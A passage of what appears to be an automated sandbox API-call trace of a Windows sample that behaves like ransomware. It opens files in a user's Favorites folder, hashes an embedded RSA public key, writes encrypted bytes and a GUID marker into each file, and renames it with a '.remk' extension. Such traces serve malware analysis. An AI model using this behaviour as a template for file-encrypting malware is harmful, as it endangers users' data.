hHeap=0x630000) returned 1 [0233.907] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.907] PathFindFileNameW (pszPath="") returned="" [0233.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.908] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.908] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0233.908] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0233.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.909] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.909] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.912] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.912] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.913] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0233.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.913] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.914] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.914] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.914] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.914] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.914] GetLastError () returned 0x0 [0233.914] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.914] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.915] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.915] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.915] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.915] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.915] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.915] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.916] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.916] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.916] CloseHandle (hObject=0x640) returned 1 [0233.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0233.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0233.918] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.remk")) returned 1 [0233.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.918] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.920] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0233.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.920] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0233.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.921] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.924] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.924] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.926] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.926] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0233.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.926] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.927] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.927] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.927] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.927] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.927] GetLastError () returned 0x0 [0233.927] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.927] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.928] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.928] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.928] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.928] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbc48 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee538 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbc90 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee580 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5e0 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.928] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee580 | out: hHeap=0x630000) returned 1 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5e0 | out: hHeap=0x630000) returned 1 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5e0 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee598 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee580 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee580 | out: hHeap=0x630000) returned 1 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5e0 | out: hHeap=0x630000) returned 1 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.930] GetCurrentThreadId () returned 0x314 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2560 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.930] GetCurrentThreadId () returned 0x314 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5e0 [0233.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee580 [0233.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0233.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee568 [0233.932] HeapFree (in: 